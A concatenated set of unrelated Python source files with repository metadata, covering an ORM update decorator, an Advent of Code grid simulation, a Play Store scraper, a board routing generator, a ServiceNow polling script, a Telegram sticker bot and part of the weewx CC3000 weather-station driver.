print("\t\tdelete_reg_orm: finished")
return aux
def print_update(fn):
def console_printer(*args):
print("\t\t\tprint_update: id = ", args[0][0]) # args[0][0] primer elemento del parámetro de update_register_orm
print("\t\t\tprint_update: título = ", args[0][1]) # args[0][1] segundo elemento del primer parámetro de update_register_orm
print("\t\t\tprint_update: descripción = ", args[0][2]) # args[0][2] tercer elemento del primer parámetro de update_register_orm
aux = fn(*args)
if aux != -1:
print("\t\t\tprint_update: One register has been updated by using decorator")
else:
print("\t\t\tprint_update: Register could not been updated by using decorator")
return aux
return console_printer
@print_update
def update_register_orm(reg_item):
print("\t\tupdate_register_orm: starting")
global db
global RegItem
aux = -1
try:
db.connect()
updateReg = RegItem(titulo=reg_item[1], descripcion=reg_item[2])
updateReg = RegItem.update(titulo=reg_item[1], descripcion=reg_item[2], objeto=str(updateReg)).where(
RegItem.id == reg_item[0])
updateReg.execute()
db.close()
aux = 1
print("\t\tupdate_register_orm: Register updated")
except:
print("\t\tupdate_register_orm: Error")
print("\t\tupdate_register_orm: finished")
return aux
| [
"saravia.jonathan.m@gmail.com"
] | saravia.jonathan.m@gmail.com |
764c228e5a8b115f7ca60c1480fdff36b20ab047 | 8a3726abfc9cb72d8ccf7d32b18edabf8d16b630 | /18/a.py | 32847a4eb7fdc71ad694396872b27a628860cf2a | [] | no_license | alex-stephens/aoc2015 | 48a46efc1a888ea2d451a5938fc404d26e96e1a0 | ccc1c85f8da7a0585003b2e4f99f3f1def35ec0b | refs/heads/master | 2023-02-05T23:02:19.148138 | 2020-12-27T19:16:47 | 2020-12-27T19:16:47 | 324,579,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | grid = [list(line.strip()) for line in open('input.txt').readlines()]
rows, cols = len(grid), len(grid[0])
def count_neighbours(i, j):
rmin, rmax = max(i-1, 0), min(i+1, rows-1)
cmin, cmax = max(j-1, 0), min(j+1, cols-1)
ans = 0
for r in range(rmin, rmax+1):
for c in range(cmin, cmax+1):
if (r,c) == (i,j):
continue
ans += 1 if grid[r][c] == '#' else 0
return ans
it = 100
for i in range(it):
new_grid = [['x' for _ in range(cols)] for _ in range(rows)]
for r in range(rows):
for c in range(cols):
count = count_neighbours(r,c)
if grid[r][c] == '#' and (count != 2 and count != 3):
new_grid[r][c] = '.'
elif grid[r][c] == '.' and count == 3:
new_grid[r][c] = '#'
else:
new_grid[r][c] = grid[r][c]
grid = [list(x) for x in new_grid]
# print('--------------------------')
# for g in grid:
# print(''.join(g))
print(sum([''.join(r).count('#') for r in grid])) | [
"alexstephens9@gmail.com"
] | alexstephens9@gmail.com |
902a07d53dec1a6b87a8c1e0e0457c6e4508b338 | 11a1d7c276cee26c7351a7d5b2049d3fd36dfa9f | /venv/Lib/site-packages/google_play_scraper/features/app.py | 74838cc49db0d4d37b7f0f3ea41625bbb6235bcd | [] | no_license | Hussain-py/apiprojec | 5a09a9a3ab576f72a0d42cf0897352a0f4748343 | efab41268de6c1daf7029eb41e28b3526b298a46 | refs/heads/main | 2023-02-24T23:32:24.332619 | 2021-01-25T09:42:41 | 2021-01-25T09:42:41 | 332,697,592 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | import json
from google_play_scraper.constants.element import ElementSpecs
from google_play_scraper.constants.regex import Regex
from google_play_scraper.constants.request import Formats
from google_play_scraper.utils.request import get
def app(app_id, lang="en", country="us"):
# type: (str, str, str) -> dict
url = Formats.Detail.build(app_id=app_id, lang=lang, country=country)
dom = get(url)
matches = Regex.SCRIPT.findall(dom)
res = {}
for match in matches:
key_match = Regex.KEY.findall(match)
value_match = Regex.VALUE.findall(match)
if key_match and value_match:
key = key_match[0]
value = json.loads(value_match[0])
res[key] = value
result = {}
for k, spec in ElementSpecs.Detail.items():
content = spec.extract_content(res)
result[k] = content
result["appId"] = app_id
result["url"] = url
return result
| [
"57086628+MrArif-5@users.noreply.github.com"
] | 57086628+MrArif-5@users.noreply.github.com |
7c8f45f5a09a6881f6fe5b227cde0ad599b55eb3 | f0395a509853c866c5193398ff445b11e7892536 | /tools/xmp16-routegen.py | 98a6110eb30e42f48b26bd0bd58196ab05749201 | [
"LicenseRef-scancode-other-permissive"
] | permissive | stevekerrison/tool_swallow_manycore | a9932f74c88327dfd2eb183b1aac0a29988ebbb2 | 64c5732cf732038c61fcf5ff635b363b1d7124b5 | refs/heads/master | 2021-01-10T03:28:54.711808 | 2015-11-26T12:37:48 | 2015-11-26T12:37:48 | 46,926,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,942 | py | #!/usr/bin/python
# Copyright (C) 2012 Steve Kerrison <github@stevekerrison.com>
#
# This software is freely distributable under a derivative of the
# University of Illinois/NCSA Open Source License posted in
# LICENSE.txt and at <http://github.xcore.com/>
header = \
"""xmp16-routegen.py
A script for generating routing tables, link settings and JTAG mappings for the
XMP16 UoB development board.
Author: Steve Kerrison <steve.kerrison@bristol.ac.uk>
Created: 11th May 2012
Accepts one argument in the form of a matlab-style matrix definition, where a
'1' signifies a board and a '0' does not. From this the network dimensions are
calculated. This is currently a redundant format due to it only supporting
rectangular board arrangements! Maybe in the future it'll be more flexible, but
it's not likely to need it in the mean time.
If "M" is specified as an additional argument, an L1 memory board is added to
the right of the top row of boards.
Example for a 2x2 mesh of boards: ./xmp16-routegen.py "1 1; 1 1"
Example for a 2x3 mesh of boards with memory: ./xmp16-routegen.py "1 1 1;1 1 1" M
"""
import sys,math
if len(sys.argv) != 2 and len(sys.argv) != 3:
print >> sys.stderr, header
sys.exit(1)
#Description of a single board's JTAG map
jtagmap = [ \
3, 2, 4, 5, \
1, 0, 6, 7, \
15, 14, 8, 9, \
13, 12, 10, 11 \
]
#How the board's JTAG quadrants are broken down
nodequadrants = [ \
0, 0, 1, 1, \
0, 0, 1, 1, \
3, 3, 2, 2, \
3, 3, 2, 2 \
]
dirmap = { \
'towards':0,'away':1, \
'left':2,'right':3, \
'up':4,'down':5 \
}
linkmap = [ \
{'a':'up','b':'down','efgh':'towards'}, \
{'a':'left','b':'right','efgh':'away'}, \
{'a':'up','b':'down','efgh':'towards'}, \
{'a':'left','b':'right','efgh':'away'}, \
]
linkregs = { 'a':0x22,'b':0x23,'c':0x20,'d':0x21, \
'e':0x26,'f':0x27,'g':0x24,'h':0x25 }
linkenable = { 'a':0x82,'b':0x83,'c':0x80,'d':0x81,\
'e':0x86,'f':0x87,'g':0x84,'h':0x85 }
nodereg = 0x05
networkpos = 4
networkwidth = 2
dirwidth = 4
dirpos = 8 #In the link control register
dirreg = 0x0c
lmap = [['towards','away'],['towards','away']]
xmap = [['towards','towards'],['right','left']]
ymap = [['down','up'],['away','away']]
#Xscopemap applied differently to the regular routing maps: row0, row1, row(>1)
scopemap = [\
['down','away','away','down'],\
['towards','left','left','towards'],\
['up','away','away','up']\
]
#Temporary mapping for memory: row0, row(>0)
memmap = [\
['towards','left','left','towards'],\
['up','away','away','up']\
]
#xmap = [['right','left'],['right','left'],['right','left'],['right','left']]
#ymap = [['down','up'],['left','left'],['right','right'],['down','up']]
#zmap = [['right','right'],['right','towards'],['away','left'],['left','left']]
#Deal with the memory board creating an irregular mesh.
#zmapmend = [['right','right'],['right','towards'],['right','left'],['up','left']]
rawconfig = sys.argv[1]
M = len(sys.argv) == 3 and sys.argv[2] == "M"
configrows = rawconfig.split(';')
config = []
for x in configrows:
config.append(map(int,x.strip().split(' ')))
#print config
#Boards are 4x4 nodes
xboardnodes = 4
yboardnodes = 4
boardnodes = xboardnodes * yboardnodes
xmemboard = int(M)
xboards = len(config[0])
yboards = len(config)
numcores = xboards * yboards * 16
xboardbits = int(math.ceil(math.log(xboardnodes)/math.log(2)))
yboardbits = int(math.ceil(math.log(yboardnodes)/math.log(2)))
xbits = int(math.ceil(math.log(xboards)/math.log(2)))
ybits = int(math.ceil(math.log(yboards)/math.log(2)))
lbits = 1 #This is the layer of the mesh that the core occupies - there are only two layers
boardbits = xboardbits + yboardbits
totalbits = boardbits+xbits+ybits
def calcdirs(lst,data,width,dirs):
for b in range(width):
x = ([dirs[0]]*(2**b) + [dirs[1]]*(2**b))*(2**(width-1)/2**b)
lst.append(x[data & (2**width-1)])
def calcjtag(y,z,c):
n = nodequadrants[c]
if n == 0:
if y == 0 and z == 0:
blocksbefore = 0
elif z == 0:
blocksbefore = (2*yboards*(((xboards-1)*2)+1)) + ((yboards-1-y)*2) + 2
else:
blocksbefore = (2*y*(((xboards-1)*2)+1))+(z*2)
elif n == 1:
blocksbefore = (2*y*(((xboards-1)*2)+1))+(z*2)+1
elif n == 2:
blocksbefore = (2*y*(((xboards-1)*2)+1))+((xboards-1)*2)+((xboards-1-z)*2)+2
else:
if z == 0:
blocksbefore = (2*yboards*(((xboards-1)*2)+1)) + ((yboards-1-y)*2) + 1
else:
blocksbefore = (2*y*(((xboards-1)*2)+1))+((xboards-1)*2)+((xboards-1-z)*2)+3
offset = n * 4
#print "c:",c
#print "bb:",blocksbefore
return (blocksbefore * 4) + jtagmap[c] - offset
#TODO: Fix routing as it's currently going to use nonexistant links to get to the memory board
"""def memboard(y,z,c):
global jtagmap
nodeid = (z+1) << (boardbits + ybits)
route = []
jtagmap = [j + 1 for j in jtagmap]
jtagnode = calcjtag(y,z,c-1)
print
print "# MEMORY BOARD START"
print "JTAG Node =",jtagnode
print hex(nodereg),"=",hex(nodeid),("\t#0b{0:0%db}" % totalbits).format(nodeid)
calcdirs(route,nodeid,xbits,xmap[nodeid&((xbits**2)-1)])
calcdirs(route,nodeid>>xbits,yboardbits,ymap[nodeid&((xbits**2)-1)])
calcdirs(route,nodeid>>(xbits+yboardbits),ybits,ymap[nodeid&((xbits**2)-1)])
calcdirs(route,nodeid>>(xbits+yboardbits+ybits),zbits,zmap[nodeid&((xbits**2)-1)])
directions = map(lambda x: dirmap[x],route)
linkdir = { \
'a': dirmap['left'], \
}
for links in linkdir:
for l in links:
print hex(linkregs[l]),"=",hex(linkdir[links]<<dirpos)
dirregs = [0,0]
dirregspos = 0
for k,d in enumerate(directions):
dirregs[dirregspos] |= directions[k]<<(k*dirwidth)
if k == 7:
dirregspos += 1
for k,d in enumerate(dirregs):
print hex(dirreg+k),"=",hex(d)
print "# MEMORY BOARD END"
print "# Resuming XMP16 board..."""
print "DIM = %d(%d)x%d(%d)" % (yboards,ybits,xboards,xbits)
def parity(x):
k = 0
d = x
while d != 0:
k = k + 1
d = d & (d - 1)
return k % 2
for y in range(yboards):
for x in range(xboards):
if config[y][x] != 1:
print >> sys.stderr, "ERROR:",sys.argv[0], "does not yet support non-rectangular board arrangements"
sys.exit(2)
#print y,x
print
print "#new board, position",y,x
for c in range(boardnodes):
#New node ID strategy is [y..y x..x c]
#c = 0 for c & 0x3 in 0,3 and c = 1 for c & 0x3 in 1,2
layer = parity(c&0x3)
nodeid = layer | (c & 0x2) | (x << xboardbits) | ((c & 0xc) << (xboardbits + xbits - 2)) | (y << (boardbits + xbits))
if M and c == 8 and y == 0 and x == xboards - 1:
memboard(y,x,c)
route = []
jtagnode = calcjtag(y,x,c)
print
print "JTAG Node =",jtagnode
print hex(nodereg),"=",hex(nodeid),("\t#0b{0:0%db}" % totalbits).format(nodeid)
calcdirs(route,nodeid,lbits,lmap[layer])
calcdirs(route,nodeid>>lbits,xbits+xboardbits-lbits,xmap[layer])
calcdirs(route,nodeid>>(xbits+xboardbits),ybits+yboardbits,ymap[layer])
# Meddle with the routing table on the end boards if a memory board is present
"""if M and x == xboards - 1 and c not in [2,3]:
calcdirs(route,nodeid>>(xbits+yboardbits+ybits),zbits,zmapmend[nodeid&((xbits**2)-1)])
else:
calcdirs(route,nodeid>>(xbits+yboardbits+ybits),zbits,zmap[nodeid&((xbits**2)-1)])"""
directions = map(lambda x: dirmap[x],route)
#print directions
linkdir = { \
'a': dirmap[linkmap[nodeid&((xboardbits**2)-1)]['a']], \
'b': dirmap[linkmap[nodeid&((xboardbits**2)-1)]['b']], \
'efgh': dirmap[linkmap[nodeid&((xboardbits**2)-1)]['efgh']] \
}
#route.reverse()
#print route
#print linkdir
for links in linkdir:
for l in links:
print hex(linkregs[l]),"=",hex(linkdir[links]<<dirpos)
dirregs = [0,0]
dirregspos = 0
for k,d in enumerate(directions):
dirregs[dirregspos] |= directions[k]<<(k*dirwidth)
if k == 7:
dirregspos += 1
#Poke in some XSCOPE stuff!!
row = min(2,c/xboardnodes + yboardnodes*y)
dirregs[1] |= dirmap[scopemap[row][c & 0x3]] << 28
row = min(1,c/xboardnodes + yboardnodes*y)
dirregs[1] |= dirmap[memmap[row][c & 0x3]] << 24
for k,d in enumerate(dirregs):
print hex(dirreg+k),"=",hex(d)
# Now throw away any links that are unconnected
if (x == 0 and (c % 4) == 1):
del linkdir['a']
elif x == xboards - 1 and (c % 4) == 2 and not (M and c == 2 and y == 0 and x == xboards - 1):
del linkdir['b']
elif y == 0 and c in [0,3]:
del linkdir['a']
elif y == yboards - 1 and c in [12,15]:
del linkdir['b']
print "Links:",
for i in [hex(linkenable[item]) for sublist in list(linkdir) for item in sublist]:
print str(i),
print
| [
"steve@stevekerrison.com"
] | steve@stevekerrison.com |
dadb8fb69ef2bdb6c0a196c367f65a32f893e669 | c2f7af7a77c3d2a57f4b6b1d27e1cd907889e3b4 | /CheckForRecipie.py | 785164c0be5a5e595bb5c7cd98fc6f985f8f557f | [] | no_license | Ngoc7-psu/ABIST440WLUKE | b87d779615619b408d660dca653f75937f6f4b54 | d0d63f55dfa5ba1152d4db9ced292132682853bd | refs/heads/master | 2022-04-20T17:49:52.972134 | 2020-04-21T02:39:26 | 2020-04-21T02:39:26 | 257,392,875 | 0 | 0 | null | 2020-04-20T20:13:17 | 2020-04-20T20:13:16 | null | UTF-8 | Python | false | false | 2,193 | py | # Team Ferment - James Bee, Virginia Hoffman, Michaela Fox, and Samantha Scheer
# IST 440 - Luke Kasper
import requests
import json
import time
def CheckForRecipies():
# Set the request parameters
url = 'https://emplkasperpsu1.service-now.com/api/now/table/x_snc_beer_brewing_mother_brewv2?sysparm_query=sys_created_onRELATIVEGT%40minute%40ago%401&sysparm_limit=1'
# Eg. User name="admin", Password="admin" for this code sample.
user = 'mmf5571'
pwd = '***'
# Set proper headers
headers = {"Content-Type": "application/json", "Accept": "application/json"}
# Do the HTTP request
response = requests.get(url, auth=(user, pwd), headers=headers)
# Check for HTTP codes other than 200
if response.status_code != 200:
print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:', response.json())
exit()
# Decode the JSON response into a dictionary and use the data
data = response.json()
print(data)
startTask = response.json()['result'][0]['rpi_to_execute']
FermentPi = startTask['FermentPi']
list = {}
while (data == list):
# Set the request parameters
url = 'https://emplkasperpsu1.service-now.com/api/now/table/x_snc_beer_brewing_mother_brewv2?sysparm_query=sys_created_onRELATIVEGT%40minute%40ago%401&sysparm_limit=1'
# Eg. User name="admin", Password="admin" for this code sample.
user = 'mmf5571'
pwd = '***'
# Set proper headers
headers = {"Content-Type": "application/json", "Accept": "application/json"}
# Do the HTTP request
response = requests.get(url, auth=(user, pwd), headers=headers)
# Check for HTTP codes other than 200
if response.status_code != 200:
print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:', response.json())
exit()
# Decode the JSON response into a dictionary and use the data
data = response.json()
print(data)
list = {}
time.sleep(25)
if(data != list):
import TeamFerment
CheckForRecipies()
| [
"noreply@github.com"
] | noreply@github.com |
1f973cbc76659678d2b81c007e9a29458338f41e | d6670f0b4a039cb95216d59918c71a185e18f492 | /plugins/download_stickers.py | b72422017bd735fb60c6830c677004dbc6305e21 | [] | no_license | dlance87/lance7bot | 7dcf10fd8f3d15e4d9d3678a5d23b169ef08e408 | dc7b5887f6e9a004cb397501d24d7398a5a1c6ef | refs/heads/master | 2021-05-17T01:19:23.169150 | 2020-03-27T14:32:56 | 2020-03-27T14:32:56 | 250,553,665 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,764 | py |
import logging
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
import os
import time
# the secret configuration specific things
if bool(os.environ.get("WEBHOOK", False)):
from sample_config import Config
else:
from config import Config
# the Strings used for this "thing"
from translation import Translation
import pyrogram
logging.getLogger("pyrogram").setLevel(logging.WARNING)
from helper_funcs.display_progress import progress_for_pyrogram
@pyrogram.Client.on_message(pyrogram.Filters.sticker)
async def DownloadStickersBot(bot, update):
logger.info(update.from_user)
download_location = Config.DOWNLOAD_LOCATION + "/" + str(update.from_user.id) + "_DownloadStickersBot_" + str(update.from_user.id) + ".png"
a = await bot.send_message(
chat_id=update.chat.id,
text=Translation.DOWNLOAD_START,
reply_to_message_id=update.message_id
)
try:
c_time = time.time()
the_real_download_location = await bot.download_media(
message=update,
file_name=download_location,
progress=progress_for_pyrogram,
progress_args=(
Translation.DOWNLOAD_START,
a,
c_time
)
)
except (ValueError) as e:
await bot.edit_message_text(
text=str(e),
chat_id=update.chat.id,
message_id=a.message_id
)
return False
await bot.edit_message_text(
text=Translation.SAVED_RECVD_DOC_FILE,
chat_id=update.chat.id,
message_id=a.message_id
)
c_time = time.time()
await bot.send_document(
chat_id=update.chat.id,
document=the_real_download_location,
# thumb=thumb_image_path,
# caption=description,
# reply_markup=reply_markup,
reply_to_message_id=a.message_id,
progress=progress_for_pyrogram,
progress_args=(
Translation.UPLOAD_START,
a,
c_time
)
)
await bot.send_photo(
chat_id=update.chat.id,
photo=the_real_download_location,
# thumb=thumb_image_path,
# caption=description,
# reply_markup=reply_markup,
reply_to_message_id=a.message_id,
progress=progress_for_pyrogram,
progress_args=(
Translation.UPLOAD_START,
a,
c_time
)
)
os.remove(the_real_download_location)
await bot.edit_message_text(
text=Translation.AFTER_SUCCESSFUL_UPLOAD_MSG,
chat_id=update.chat.id,
message_id=a.message_id,
disable_web_page_preview=True
)
| [
"noreply@github.com"
] | noreply@github.com |
9645c10049da11712293d7d3e8fd4238034dfe51 | b0779d29c84bedc5e89fc491abb0dbc5513b2793 | /knnreg.py | 0cf0ff877386ee8703e145edee38cfcb9ebe1e96 | [] | no_license | kalyaicasia/KNN-Regression | f80f5b1727b81a6d55c15842e1e66dc1053e9864 | 8308fe5bfd8ae79bc1d35c391e5bbe6723e5fb8b | refs/heads/main | 2023-06-21T23:02:19.234475 | 2021-07-22T08:18:21 | 2021-07-22T08:18:21 | 388,041,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,706 | py | import numpy as np
class knnreg ():
def __init__(self, distfcn = "euclidean", normfcn = "on") :
if distfcn.lower() == "euclidean": self.q = 2
else: self.q = 1
self.normfn = normfcn.lower()
def colcheck(self,ma): #fix the data input if the input is only 1 collumn of data
try:
len(ma[0])
except TypeError:
ma = [[x] for x in ma]
return ma
def rowcheck(self, ma): #fix the data input if the input is only 1 row of data
try:
len(ma[0])
except TypeError:
ma = [ma]
return ma
def normalize(self, da, atrc): #counts the maxmin values for each atr, normalizes all atribute values
self.max[atrc] = max(da)
self.min[atrc] = min(da)
self.den[atrc] = self.max[atrc] - self.min[atrc]
return [((x-self.min[atrc])/(self.den[atrc])) for x in da]
def calcdist(self, nd, ed): #calculates euclidean distance
sigma = sigma = [(abs(nd[ed.index(x)]-x))**self.q for x in ed]
distance = (sum(sigma))**(1/self.q)
return distance
def fit (self, dec, tar): #initializes variables, obtains the needed values from data
tar = self.colcheck(tar)
self.tar = tar
self.samples = len(tar)
self.atr = len(dec)
#normalize values to match each data to scale if the function is ON
if self.normfn == "on":
#transform data matrix so that the first index refers to each attributes
self.alt = np.array(dec)
self.dec = self.alt.T.tolist() #self.dec - index refers to atributes
self.min = [0]*self.atr
self.max = [0]*self.atr
self.den = [0]*self.atr
self.dec = [self.normalize(x,self.dec.index(x)) for x in self.dec]
self.alt = np.array(self.dec).T.tolist() #self.alt - index refers to samples
else: self.alt = dec
print("Model Fitted")
def predicteach(self, k, nd):
if self.normfn == "on":
i=0
for x in nd:
nd[i] = (nd[i]-self.min[i])/(self.den[i])
i=i+1
#calculate distances
dist = [self.calcdist(nd,x) for x in self.alt]
#find the k closest targets
kc = k
dsum = 0
exd = dist
while kc > 0 :
loc = dist.index(min(exd)) #find index of the closest datas
dsum = dsum + self.tar[loc][0] #total prediced from obtained index
exd[loc]=max(exd) #remove the current min value
kc = kc-1 #counts how many more predicitions are needed
#calculate predicted value
pv = dsum / k
return pv
def predict(self, k, nd):
nd = self.rowcheck(nd)
predv = [0]*len(nd)
i = 0
while i<len(nd):
predv[i] = [self.predicteach(k,nd[i])]
i=i+1
return predv
def check(self, pv, nt):
pv = self.colcheck(pv)
nt = self.colcheck(nt)
count = [0]*len(pv)
i = 0
for x in count:
count [i] = abs(pv[i][0] - nt[i][0])/nt[i][0]
i = i+1
error = (sum(count)/len(pv))*100
acc = 100 - error
return error, acc | [
"noreply@github.com"
] | noreply@github.com |
280cab33335daf580bca95b971a5c093b1896c52 | 6a95112805b64322953429270a305d01fef3faea | /dist/weewx-4.10.0/bin/weewx/drivers/cc3000.py | 22f01d1c3bb42aab59083b7c30094abe338751ce | [
"GPL-1.0-or-later",
"GPL-3.0-only",
"Apache-2.0"
] | permissive | tomdotorg/docker-weewx | c6d59dc492a9e53f3bc898f7b9f593717092d72c | 7085654f455d39b06acc688738fde27e1f78ad1e | refs/heads/main | 2023-06-08T17:57:44.184399 | 2023-01-30T11:21:23 | 2023-01-30T11:21:23 | 54,113,384 | 21 | 16 | Apache-2.0 | 2022-10-19T23:46:26 | 2016-03-17T11:39:29 | Dockerfile | UTF-8 | Python | false | false | 64,470 | py | #!/usr/bin/env python
#
# Copyright 2014 Matthew Wall
# See the file LICENSE.txt for your rights.
"""Driver for CC3000 data logger
http://www.rainwise.com/products/attachments/6832/20110518125531.pdf
There are a few variants:
CC-3000_ - __
| |
| 41 = 418 MHz
| 42 = 433 MHz
| __ = 2.4 GHz (LR compatible)
R = serial (RS232, RS485)
_ = USB 2.0
The CC3000 communicates using FTDI USB serial bridge. The CC3000R has both
RS-232 and RS-485 serial ports, only one of which may be used at a time.
A long range (LR) version transmits up to 2 km using 2.4GHz.
The RS232 communicates using 115200 N-8-1
The instrument cluster contains a DIP switch controls with value 0-3 and a
default of 0. This setting prevents interference when there are multiple
weather stations within radio range.
The CC3000 includes a temperature sensor - that is the source of inTemp. The
manual indicates that the CC3000 should run for 3 or 4 hours before applying
any calibration to offset the heat generated by CC3000 electronics.
The CC3000 uses 4 AA batteries to maintain its clock. Use only rechargeable
NiMH batteries.
The logger contains 2MB of memory, with a capacity of 49834 records (over 11
months of data at a 10 minute logging interval). The exact capacity depends
on the sensors; the basic sensor record is 42 bytes.
The logger does not delete old records when it fills up; once the logger is
full, new data are lost. So the driver must periodically clear the logger
memory.
This driver does not support hardware record_generation. It does support
catchup on startup.
If you request many history records then interrupt the receive, the logger will
continue to send history records until it sends all that were requested. As a
result, any queries made while the logger is still sending will fail.
The rainwise rain bucket measures 0.01 inches per tip. The logger firmware
automatically converts the bucket tip count to the measure of rain in ENGLISH
or METRIC units.
The historical records (DOWNLOAD), as well as current readings (NOW) track
the amount of rain since midnight; i.e., DOWNLOAD records rain value resets to 0
at midnight and NOW records do the same.
The RAIN=? returns a rain counter that only resets with the RAIN=RESET command.
This counter isn't used by weewx. Also, RAIN=RESET doesn't just reset this
counter, it also resets the daily rain count.
Logger uses the following units:
ENGLISH METRIC
wind mph m/s
rain inch mm
pressure inHg mbar
temperature F C
The CC3000 has the habit of failing to execute about 1 in 6000
commands. That the bad news. The good news is that the
condition is easily detected and the driver can recover in about 1s.
The telltale sing of failure is the first read after sending
the command (to read the echo of the command) times out. As such,
the timeout is set to 1s. If the timeout is hit, the buffers
are flushed and the command is retried. Oh, and there is one
more pecurliar part to this. On the retry, the command is echoed
as an empty string. That empty string is expected on the retry
and execution continues.
weewx includes a logwatch script that makes it easy to see the above
behavior in action. In the snippet below, 3 NOW commands and one
IME=? were retried successfully. The Retry Info section shows
that all succeeded on the second try.
--------------------- weewx Begin ------------------------
average station clock skew: 0.0666250000000001
min: -0.53 max: 0.65 samples: 160
counts:
archive: records added 988
cc3000: NOW cmd echo timed out 3
cc3000: NOW echoed as empty string 3
cc3000: NOW successful retries 3
cc3000: TIME=? cmd echo timed out 1
cc3000: TIME=? echoed as empty string 1
cc3000: TIME=? successful retries 1
....
cc3000 Retry Info:
Dec 29 00:50:04 ella weewx[24145] INFO weewx.drivers.cc3000: TIME=?: Retry worked. Total tries: 2
Dec 29 04:46:21 ella weewx[24145] INFO weewx.drivers.cc3000: NOW: Retry worked. Total tries: 2
Dec 29 08:31:11 ella weewx[22295] INFO weewx.drivers.cc3000: NOW: Retry worked. Total tries: 2
Dec 29 08:50:51 ella weewx[22295] INFO weewx.drivers.cc3000: NOW: Retry worked. Total tries: 2
....
---------------------- weewx End -------------------------
Clearing memory on the CC3000 takes about 12s. As such, the 1s
timeout mentioned above won't work for this command. Consequently,
when executing MEM=CLEAR, the timeout is set to 20s. Should this
command fail, rather than losing 1 second retrying, 20 sexconds
will be lost.
The CC3000 very rarely stops returning observation values.
[Observed once in 28 months of operation over two devices.]
Operation returns to normal after the CC3000 is rebooted.
This driver now reboots when this situation is detected.
If this happens, the log will show:
INFO weewx.drivers.cc3000: No data from sensors, rebooting.
INFO weewx.drivers.cc3000: Back from a reboot:
INFO weewx.drivers.cc3000: ....................
INFO weewx.drivers.cc3000:
INFO weewx.drivers.cc3000: Rainwise CC-3000 Version: 1.3 Build 022 Dec 02 2016
INFO weewx.drivers.cc3000: Flash ID 202015
INFO weewx.drivers.cc3000: Initializing memory...OK.
This driver was tested with:
Rainwise CC-3000 Version: 1.3 Build 022 Dec 02 2016
Earlier versions of this driver were tested with:
Rainwise CC-3000 Version: 1.3 Build 006 Sep 04 2013
Rainwise CC-3000 Version: 1.3 Build 016 Aug 21 2014
"""
# FIXME: Come up with a way to deal with firmware inconsistencies. if we do
# a strict protocol where we wait for an OK response, but one version of
# the firmware responds whereas another version does not, this leads to
# comm problems. specializing the code to handle quirks of each
# firmware version is not desirable.
# UPDATE: As of 0.30, the driver does a flush of the serial buffer before
# doing any command. The problem detailed above (OK not being returned)
# was probably because the timeout was too short for the MEM=CLEAR
# command. That command gets a longer timeout in version 0.30.
# FIXME: Figure out why system log messages are lost. When reading from the logger
# there are many messages to the log that just do not show up, or msgs
# that appear in one run but not in a second, identical run. I suspect
# that system log cannot handle the load? or its buffer is not big enough?
# Update:
# With debug=0, this has never been observed in v1.3 Build 22 Dec 02 2016.
# With debug=1, tailing the log looks like everything is running, but no
# attempt was made to compuare log data between runs. Observations on
# NUC7i5 running Debian Buster.
from __future__ import with_statement
from __future__ import absolute_import
from __future__ import print_function
import datetime
import logging
import math
import serial
import string
import sys
import time
from six import byte2int
from six import PY2
from six.moves import input
import weeutil.weeutil
import weewx.drivers
import weewx.wxformulas
from weeutil.weeutil import to_int
from weewx.crc16 import crc16
log = logging.getLogger(__name__)
DRIVER_NAME = 'CC3000'
DRIVER_VERSION = '0.40'
def loader(config_dict, engine):
return CC3000Driver(**config_dict[DRIVER_NAME])
def configurator_loader(config_dict):
return CC3000Configurator()
def confeditor_loader():
return CC3000ConfEditor()
DEBUG_SERIAL = 0
DEBUG_CHECKSUM = 0
DEBUG_OPENCLOSE = 0
class ChecksumError(weewx.WeeWxIOError):
def __init__(self, msg):
weewx.WeeWxIOError.__init__(self, msg)
class ChecksumMismatch(ChecksumError):
def __init__(self, a, b, buf=None):
msg = "Checksum mismatch: 0x%04x != 0x%04x" % (a, b)
if buf is not None:
msg = "%s (%s)" % (msg, buf)
ChecksumError.__init__(self, msg)
class BadCRC(ChecksumError):
def __init__(self, a, b, buf=None):
msg = "Bad CRC: 0x%04x != '%s'" % (a, b)
if buf is not None:
msg = "%s (%s)" % (msg, buf)
ChecksumError.__init__(self, msg)
class CC3000Configurator(weewx.drivers.AbstractConfigurator):
def add_options(self, parser):
super(CC3000Configurator, self).add_options(parser)
parser.add_option("--info", dest="info", action="store_true",
help="display weather station configuration")
parser.add_option("--current", dest="current", action="store_true",
help="display current weather readings")
parser.add_option("--history", dest="nrecords", type=int, metavar="N",
help="display N records (0 for all records)")
parser.add_option("--history-since", dest="nminutes", metavar="N",
type=int, help="display records since N minutes ago")
parser.add_option("--clear-memory", dest="clear", action="store_true",
help="clear station memory")
parser.add_option("--get-header", dest="gethead", action="store_true",
help="display data header")
parser.add_option("--get-rain", dest="getrain", action="store_true",
help="get the rain counter")
parser.add_option("--reset-rain", dest="resetrain", action="store_true",
help="reset the rain counter")
parser.add_option("--get-max", dest="getmax", action="store_true",
help="get the max values observed")
parser.add_option("--reset-max", dest="resetmax", action="store_true",
help="reset the max counters")
parser.add_option("--get-min", dest="getmin", action="store_true",
help="get the min values observed")
parser.add_option("--reset-min", dest="resetmin", action="store_true",
help="reset the min counters")
parser.add_option("--get-clock", dest="getclock", action="store_true",
help="display station clock")
parser.add_option("--set-clock", dest="setclock", action="store_true",
help="set station clock to computer time")
parser.add_option("--get-interval", dest="getint", action="store_true",
help="display logger archive interval, in seconds")
parser.add_option("--set-interval", dest="interval", metavar="N",
type=int,
help="set logging interval to N seconds")
parser.add_option("--get-units", dest="getunits", action="store_true",
help="show units of logger")
parser.add_option("--set-units", dest="units", metavar="UNITS",
help="set units to METRIC or ENGLISH")
parser.add_option('--get-dst', dest='getdst', action='store_true',
help='display daylight savings settings')
parser.add_option('--set-dst', dest='setdst',
metavar='mm/dd HH:MM,mm/dd HH:MM,[MM]M',
help='set daylight savings start, end, and amount')
parser.add_option("--get-channel", dest="getch", action="store_true",
help="display the station channel")
parser.add_option("--set-channel", dest="ch", metavar="CHANNEL",
type=int,
help="set the station channel")
